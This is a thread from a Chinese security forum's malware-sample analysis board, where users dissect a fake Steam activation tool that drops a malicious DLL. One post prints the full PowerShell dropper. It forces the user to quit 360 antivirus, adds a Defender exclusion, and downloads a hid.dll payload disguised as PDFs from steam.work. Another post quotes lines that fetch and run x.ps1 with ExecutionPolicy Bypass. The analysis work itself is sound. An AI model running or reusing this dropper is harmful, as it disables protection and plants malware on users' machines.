收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 赛博花柳病 黑dll
123下一页
返回列表 发新帖
楼主: hsks
 收起左侧

[病毒样本] 赛博花柳病 黑dll

[复制链接]
QVM360
发表于 2024-7-13 22:39:38 | 显示全部楼层
这玩意不是html文本吗,怎么是ps1
回复

举报

hsks
 楼主| 发表于 2024-7-13 22:48:49 | 显示全部楼层
QVM360 发表于 2024-7-13 22:39
这玩意不是html文本吗,怎么是ps1

我看triage用ps1脚本能运行就改成ps1后缀了(
回复

举报

ANY.LNK
发表于 2024-7-13 22:49:02 | 显示全部楼层
QVM360 发表于 2024-7-13 22:39
这玩意不是html文本吗,怎么是ps1

这不会是Steam的页面吧,页面标题是Welcome To Steam
回复

举报

QVM360
发表于 2024-7-13 22:50:15 | 显示全部楼层
hsks 发表于 2024-7-13 22:48
我看triage用ps1脚本能运行就改成ps1后缀了(

我实体机双击运行没运行成功
回复

举报

hsks
 楼主| 发表于 2024-7-13 23:00:29 | 显示全部楼层
QVM360 发表于 2024-7-13 22:50
我实体机双击运行没运行成功

看了下,还真是html文本
我把隔壁锁下,这个帖子贴的是最终的dll
回复

举报

hsks
 楼主| 发表于 2024-7-13 23:03:28 | 显示全部楼层
QVM360 发表于 2024-7-13 22:50
我实体机双击运行没运行成功

找到ps1样本了,但payload可能拉不下来了
https://www.virustotal.com/gui/f ... d2bad7bd6/detection
回复

举报

QVM360
发表于 2024-7-13 23:11:59 | 显示全部楼层
hsks 发表于 2024-7-13 23:03
找到ps1样本了,但payload可能拉不下来了
https://www.virustotal.com/gui/file/247d3536678aa724d7483a ...
  1. cls
  2. Write-Host -NoNewline "          _____                _____                    _____                    _____                    _____          `r" -ForegroundColor:blue
  3. Write-Host -NoNewline "         /\    \              /\    \                  /\    \                  /\    \                  /\    \         `r" -ForegroundColor:blue
  4. Write-Host -NoNewline "        /::\    \            /::\    \                /::\    \                /::\    \                /::\____\        `r" -ForegroundColor:blue
  5. Write-Host -NoNewline "       /::::\    \           \:::\    \              /::::\    \              /::::\    \              /::::|   |        `r" -ForegroundColor:blue
  6. Write-Host -NoNewline "      /::::::\    \           \:::\    \            /::::::\    \            /::::::\    \            /:::::|   |        `r" -ForegroundColor:blue
  7. Write-Host -NoNewline "     /:::/\:::\    \           \:::\    \          /:::/\:::\    \          /:::/\:::\    \          /::::::|   |        `r" -ForegroundColor:blue
  8. Write-Host -NoNewline "    /:::/__\:::\    \           \:::\    \        /:::/__\:::\    \        /:::/__\:::\    \        /:::/|::|   |        `r" -ForegroundColor:blue
  9. Write-Host -NoNewline "    \:::\   \:::\    \          /::::\    \      /::::\   \:::\    \      /::::\   \:::\    \      /:::/ |::|   |        `r" -ForegroundColor:blue
  10. Write-Host -NoNewline "  ___\:::\   \:::\    \        /::::::\    \    /::::::\   \:::\    \    /::::::\   \:::\    \    /:::/  |::|___|______  `r" -ForegroundColor:blue
  11. Write-Host -NoNewline " /\   \:::\   \:::\    \      /:::/\:::\    \  /:::/\:::\   \:::\    \  /:::/\:::\   \:::\    \  /:::/   |::::::::\    \ `r" -ForegroundColor:blue
  12. Write-Host -NoNewline "/::\   \:::\   \:::\____\    /:::/  \:::\____\/:::/__\:::\   \:::\____\/:::/  \:::\   \:::\____\/:::/    |:::::::::\____\`r" -ForegroundColor:blue
  13. Write-Host -NoNewline "\:::\   \:::\   \::/    /   /:::/    \::/    /\:::\   \:::\   \::/    /\::/    \:::\  /:::/    /\::/    / ~~~~~/:::/    /`r" -ForegroundColor:blue
  14. Write-Host -NoNewline " \:::\   \:::\   \/____/   /:::/    / \/____/  \:::\   \:::\   \/____/  \/____/ \:::\/:::/    /  \/____/      /:::/    / `r" -ForegroundColor:blue
  15. Write-Host -NoNewline "  \:::\   \:::\    \      /:::/    /            \:::\   \:::\    \               \::::::/    /               /:::/    /  `r" -ForegroundColor:blue
  16. Write-Host -NoNewline "   \:::\   \:::\____\    /:::/    /              \:::\   \:::\____\               \::::/    /               /:::/    /   `r" -ForegroundColor:blue
  17. Write-Host -NoNewline "    \:::\  /:::/    /    \::/    /                \:::\   \::/    /               /:::/    /               /:::/    /    `r" -ForegroundColor:blue
  18. Write-Host -NoNewline "     \:::\/:::/    /      \/____/                  \:::\   \/____/               /:::/    /               /:::/    /     `r" -ForegroundColor:blue
  19. Write-Host -NoNewline "      \::::::/    /                                 \:::\    \                  /:::/    /               /:::/    /      `r" -ForegroundColor:blue
  20. Write-Host -NoNewline "       \::::/    /                                   \:::\____\                /:::/    /               /:::/    /       `r" -ForegroundColor:blue
  21. Write-Host -NoNewline "        \::/    /                                     \::/    /                \::/    /                \::/    /        `r" -ForegroundColor:blue
  22. Write-Host -NoNewline "         \/____/                                       \/____/                  \/____/                  \/____/         `r" -ForegroundColor:blue

  24. $filePathToDelete = Join-Path $env:USERPROFILE "x.ps1"
  25. if (Test-Path $filePathToDelete) {
  26.     Remove-Item -Path $filePathToDelete
  27. }
  28. $desktopFilePathToDelete = Join-Path ([System.Environment]::GetFolderPath('Desktop')) "x.ps1"
  29. if (Test-Path $desktopFilePathToDelete) {
  30.     Remove-Item -Path $desktopFilePathToDelete
  31. }

  33. $steamRegPath = 'HKCU:\Software\Valve\Steam'
  34. $localPath = -join ($env:LOCALAPPDATA,"\SteamActive")
  35. if ((Test-Path $steamRegPath)) {
  36.     $properties = Get-ItemProperty -Path $steamRegPath
  37.     if ($properties.PSObject.Properties.Name -contains 'SteamPath') {
  38.         $steamPath = $properties.SteamPath
  39.     }
  40. }

  42. if (-not ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {
  43.     Write-Host "[请重新打开Power shell 打开方式以管理员身份运行]" -ForegroundColor:red
  44.     exit
  45. }

  47. function PwStart() {
  48.     if(Get-Process "360Tray*" -ErrorAction Stop){
  49.         while(Get-Process 360Tray* -ErrorAction Stop){
  50.             Write-Host "[请先退出360安全卫士]" -ForegroundColor:Red
  51.             Start-Sleep 1.5
  52.         }
  53.         PwStart

  55.     }
  56.     if(Get-Process "360sd*" -ErrorAction Stop)
  57.     {
  58.         while(Get-Process 360sd* -ErrorAction Stop){
  59.             Write-Host "[请先退出360杀毒]" -ForegroundColor:Red
  60.             Start-Sleep 1.5
  61.         }
  62.         PwStart
  63.     }

  65.     if ($steamPath -eq ""){
  66.         Write-Host "[请检查您的Steam是否正确安装]" -ForegroundColor:Red
  67.         exit
  68.     }
  69.     Write-Host "[ServerStart        OK]" -ForegroundColor:green
  70.     Stop-Process -Name steam* -Force -ErrorAction Stop
  71.     Start-Sleep 2
  72.     if(Get-Process steam* -ErrorAction Stop){
  73.         TASKKILL /F /IM "steam.exe" | Out-Null
  74.         Start-Sleep 2
  75.     }

  77.     if (!(Test-Path $localPath)) {
  78.         md $localPath | Out-Null
  79.         if (!(Test-Path $localPath)) {
  80.             New-Item $localPath -ItemType directory -Force | Out-Null
  81.         }
  82.     }

  84.     $catchPath = -join ($steamPath,"\package\data")
  85.     if ((Test-Path $catchPath)) {
  86.         if ((Test-Path $catchPath)) {
  87.             Remove-Item $catchPath -Recurse -Force | Out-Null
  88.         }
  89.     }

  91.     try{
  92.         Add-MpPreference -ExclusionPath $steamPath -ErrorAction Stop
  93.         Start-Sleep 3
  94.     }catch{}

  96.     Write-Host "[Result->0          OK]" -ForegroundColor:green

  98.     try{
  99.         $d = $steamPath + "/version.dll"
  100.         if (Test-Path $d) {
  101.             Remove-Item $d -Recurse -Force -ErrorAction Stop | Out-Null #清除文件
  102.         }
  103.         $d = $steamPath + "/user32.dll"
  104.         if (Test-Path $d) {
  105.             Remove-Item $d -Recurse -Force -ErrorAction Stop | Out-Null #清除文件
  106.         }
  107.         $d = $steamPath + "/steam.cfg"
  108.         if (Test-Path $d) {
  109.             Remove-Item $d -Recurse -Force -ErrorAction Stop | Out-Null #清除文件
  110.         }
  111.         $d = $steamPath + "/hid.dll"
  112.         if (Test-Path $d) {
  113.             Remove-Item $d -Recurse -Force -ErrorAction Stop | Out-Null #清除文件
  114.         }
  115.     }catch{
  116.         Write-Host "[异常残留请检查[$d]文件是否异常!]" -ForegroundColor:red
  117.         exit
  118.     }

  120.     $downloadData = "http://steam.work/pwsDwFile/bcfc1e52ca77ad82122dfe4c9560f3ec.pdf"
  121.     $downloadLink = "http://steam.work/pwsDwFile/9b96dac2bb0ba18d56068fabc5b17185.pdf"
  122.    
  123.     irm -Uri $downloadLink -OutFile $d -ErrorAction Stop
  124.     Write-Host "[Result->1          OK]" -ForegroundColor:green
  125.     $d = $localPath + "/hid"
  126.     irm -Uri $downloadData -OutFile $d -ErrorAction Stop
  127.     Write-Host "[Result->2          OK]" -ForegroundColor:green
  128.    
  129.     Start-Sleep 1

  131.     Start steam://
  132.     Write-Host "[连接服务器成功请在Steam输入激活码 3秒后自动关闭]" -ForegroundColor:green
  133.     Start-Sleep 3
  134.    
  135.     $processID = Get-CimInstance Win32_Process -Filter "ProcessId = '$pid'"
  136.     Stop-Process -Id $processID.ParentProcessId -Force
  137.     exit

  139. }

  141. PwStart
复制代码
回复

举报

00006666
发表于 2024-7-13 23:14:17 | 显示全部楼层
本帖最后由 00006666 于 2024-7-13 23:15 编辑
hsks 发表于 2024-7-13 23:03
找到ps1样本了,但payload可能拉不下来了
https://www.virustotal.com/gui/file/247d3536678aa724d7483a ...

相关IP的通信样本能找到52个,行为基本差不多

https://ti.qianxin.com/v2/search?type=ip&value=1.198.4.249
回复

举报

Eset小粉絲
发表于 2024-7-13 23:15:57 | 显示全部楼层
html 嵌入 powershell
Line 29 irm steam.work/pwsDwFile/new -OutFile x.ps1
Line 230 powershell.exe -ExecutionPolicy Bypass -File x.ps1;
Anyway
New malicious software was found in the attached file. Its detection will be included in the next update.
Thank you for your help.

Best regards, Denis Sitchikhin, Malware Analyst


回复

举报

hsks
 楼主| 发表于 2024-7-13 23:18:56 | 显示全部楼层
Eset小粉絲 发表于 2024-7-13 23:15
html 嵌入 powershell
Line 29 irm steam.work/pwsDwFile/new -OutFile x.ps1
Line 230 powershell.exe - ...

所以那个html还是恶意的?
回复

举报

下一页 »
123下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-15 08:52 , Processed in 0.086808 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表